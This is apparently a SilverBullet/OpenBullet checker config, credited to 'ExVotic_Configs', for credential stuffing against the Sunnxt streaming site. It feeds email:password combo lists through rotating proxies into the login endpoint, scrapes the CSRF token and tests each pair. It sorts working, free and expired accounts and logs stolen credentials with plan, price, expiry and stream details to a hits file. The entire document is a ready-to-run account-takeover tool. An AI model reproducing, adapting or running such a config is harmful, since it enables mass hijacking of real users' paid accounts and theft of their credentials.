[SETTINGS]
{
  "Name": "Sunnxt @ExVotic_Configs",
  "SuggestedBots": 40,
  "MaxCPM": 0,
  "LastModified": "2022-08-04T00:50:00.768621+05:30",
  "AdditionalInfo": "",
  "RequiredPlugins": [],
  "Author": "ExVotic_Configs",
  "Version": "1.1.1 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "Sunnxt",
  "IconPath": "Icon\\svbfile.ico",
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
#User_Agent FUNCTION GetRandomUA -> VAR "UA" 

#Token_Request REQUEST GET "https://www.sunnxt.com/login" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

#CSRF PARSE "<SOURCE>" LR "name=\"csrf-token\" content=\"" "\" />" -> VAR "csrf" 

#Account_Validation REQUEST POST "https://www.sunnxt.com/login" 
  CONTENT "{\"email\":\"<USER>\",\"password\":\"<PASS>\"}" 
  CONTENTTYPE "application/json" 
  HEADER "origin: https://www.sunnxt.com" 
  HEADER "referer: https://www.sunnxt.com/" 
  HEADER "sec-ch-ua: \".Not/A)Brand\";v=\"99\", \"Google Chrome\";v=\"103\", \"Chromium\";v=\"103\"" 
  HEADER "sec-ch-ua-mobile: ?1" 
  HEADER "sec-ch-ua-platform: \"Android\"" 
  HEADER "sec-fetch-dest: empty" 
  HEADER "sec-fetch-mode: cors" 
  HEADER "x-csrf-token: <csrf>" 
  HEADER "x-requested-with: XMLHttpRequest" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "<RESPONSECODE>" Contains "401" 
    KEY "Kindly Verify Your User Id Or Password And Try Again." 
  KEYCHAIN Success OR 
    KEY "<RESPONSECODE>" Contains "200" 
    KEY "status\":\"ok" 
  KEYCHAIN Custom "FREE" OR 
    KEY "\\\"subscriptionStatus\\\": \\\"Inactive\\\"," 

UTILITY File "Combo\\Combos.txt" AppendLines "" 

#Exp1 PARSE "<SOURCE>" JSON "validityEndDate" -> VAR "exp1" 

#Exp2 FUNCTION Translate 
  KEY "Jan" VALUE "01" 
  KEY "Feb" VALUE "02" 
  KEY "Mar" VALUE "03" 
  KEY "Apr" VALUE "04" 
  KEY "May" VALUE "05" 
  KEY "Jun" VALUE "06" 
  KEY "Jul" VALUE "07" 
  KEY "Aug" VALUE "08" 
  KEY "Sep" VALUE "09" 
  KEY "Oct" VALUE "10" 
  KEY "Nov" VALUE "11" 
  KEY "Dec" VALUE "12" 
  "<exp1>" -> VAR "exp2" 

#Exp3 FUNCTION Remove "5" "1" "<exp2>" -> VAR "exp3" 

#Expiry FUNCTION Replace " " "-" "<exp3>" -> CAP "Expiry" 

#Exp4 FUNCTION DateToUnixTime "dd-MM-yyyy" "<Expiry>" -> VAR "a" 

#Current_date FUNCTION CurrentUnixTime -> VAR "b" 

#Round FUNCTION Compute "(<a>-<b>)/86400" -> VAR "Round" 

#Remaining_Days FUNCTION Round "<Round>" -> CAP "Remaining Days" 

#Renewal PARSE "<SOURCE>" JSON "renewal" CreateEmpty=FALSE -> CAP "Renewal" 

#Maximum_Streams PARSE "<SOURCE>" JSON "maxConcurrentStreams" CreateEmpty=FALSE -> CAP "Maximum Streams" 

#Devices_Allowed PARSE "<SOURCE>" JSON "devicesAllowed" CreateEmpty=FALSE -> CAP "Devices Allowed" 

#Subscription PARSE "<SOURCE>" LR "\",\"name\":\"" "\",\"" CreateEmpty=FALSE -> CAP "Subscription" 

#Plan_Price PARSE "<SOURCE>" JSON "priceCharged" CreateEmpty=FALSE -> CAP "Plan Price" 

KEYCHECK 
  KEYCHAIN Success OR 
    KEY "<Remaining Days>" GreaterThan "0" 
  KEYCHAIN Custom "EXPIRED" OR 
    KEY "<Remaining Days>" LessThanOrEqual "0" 

#Credits FUNCTION Constant "@ExVotic_Configs" -> CAP "Config By" 

UTILITY File "Hits\\Sunnxt_Hits.txt" AppendLines "\\n[+]----------- Sunnxt Account ----------[+]\\n \\nEmail = <USER>\\nPassword = <PASS>\\n \\n[+] Expiry = <Expiry>\\n[+] Days Left = <Remaining Days>\\n[+] Plan = <Subscription>\\n[+] Price = <Plan Price>\\n[+] Renewal = <Renewal>\\n[+] Maximum Streams = <Maximum Streams>\\n[+] Devices Allowed = <Devices Allowed>\\n[+] Config By = @ExVotic | Join @ExVotic_Network\\n\\n[+]-----------------------------------[+]\\n " 

